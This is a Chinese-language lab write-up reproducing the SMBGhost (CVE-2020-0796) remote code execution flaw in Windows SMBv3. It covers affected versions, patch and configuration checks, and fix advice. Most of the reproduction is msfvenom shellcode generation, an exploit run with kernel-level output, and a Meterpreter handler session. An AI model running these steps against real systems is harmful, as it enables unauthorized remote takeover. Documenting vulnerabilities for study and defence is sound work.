漏洞复现-CVE-2020-0796_SMBGhost_Remote_Code_Execution

XT 2020-03-13 20:28:00

CVE-2020-0796 ‘SMBGhost’ Remote Code Execution

漏洞描述:

在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

漏洞原理:

https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/
https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
https://mp.weixin.qq.com/s/vM4jPmklOmFTVo3xI-0JFg

影响版本:

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

补丁检测:

1
systeminfo | findstr KB4551762

smb服务确认:(只影响 SMB v3.1.1,1903和1909)因为 SMBv2 和 SMBv3 共用一个堆叠,所以在 Windows 8 或 Windows Server 2012 中启用或禁用 SMBv2 时,也会启用或禁用 SMBv3

1
2
3
4
5
PS C:\Windows\system32> Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol

EnableSMB1Protocol EnableSMB2Protocol
------------------ ------------------
True True

漏洞检测poc:

漏洞利用exp:

RCE: https://www.exploit-db.com/exploits/48537
LPE: https://github.com/ZecOps/CVE-2020-0796-LPE-POC

漏洞复现:

  1. 开启smb3.0
    运行>control,选择程序及功能
    打开windows功能SMB 1.0/CIFS 文件共享支持,重启,
  2. 查看SMB2.0(3.0共用服务)是否开启
    ps>Get-SmbServerConfiguration | Select
  3. 关闭防火墙
  1. 调整exp的攻击内容,通过msf生成shellcode在受害者主机开启个5555为端口的(spoolsv.exe)监听连接进程
    1
    msfvenom -p windows/x64/meterpreter/bind_tcp lport=5555 -f py -o Desktop/shellcode.txt
  1. 准备就绪执行exp
    python3 exploit.py -ip 192.168.145.146 # 配置存在问题的ip并执行

执行成功

1
2
3
4
5
6
7
8
9
10
11
12
13
kali@kali:~/Desktop/SMBGhost_RCE_PoC-master$ python3 exploit.py -ip 192.168.145.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7b0c0000000
[+] found PML4 self-ref entry 152
[+] found HalpInterruptController at fffff7b0c0001478
[+] found HalpApicRequestInterrupt at fffff8026e55ebb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffffa97bc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...

此时在被攻击机内存中出现一条进程spoolsv.exe,监听端口为5555,下面使用msf连接。

  1. 配置连接受害者机器及端口
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置连接模式,直连
    msf5 exploit(multi/handler) > set rhost 192.168.145.146 #设置目标靶机IP地址
    msf5 exploit(multi/handler) > set lport 5555 #设置靶机监听的端口
    msf5 exploit(multi/handler) > exploit -j -t
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.
    msf5 exploit(multi/handler) >
    [*] Started bind TCP handler against 192.168.145.146:5555
    [*] Sending stage (201283 bytes) to 192.168.145.146
    [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.145.146:5555) at 2020-06-11 02:57:49 -0400
    session上线。

一个意外发现 python2执行命令,脚本执行异常可导致蓝屏现象

载入执行exp
python exploit.py -ip 192.168.145.146


https://mp.weixin.qq.com/s/vM4jPmklOmFTVo3xI-0JFg

修复建议:
CVE-2020-0796是内存破坏漏洞,精心利用可导致远程代码执行,同时网络上已经出现该漏洞的本地提权利用代码。在此,建议受影响版本Windows用户及时根据微软官方漏洞防护公告对该漏洞进行防护。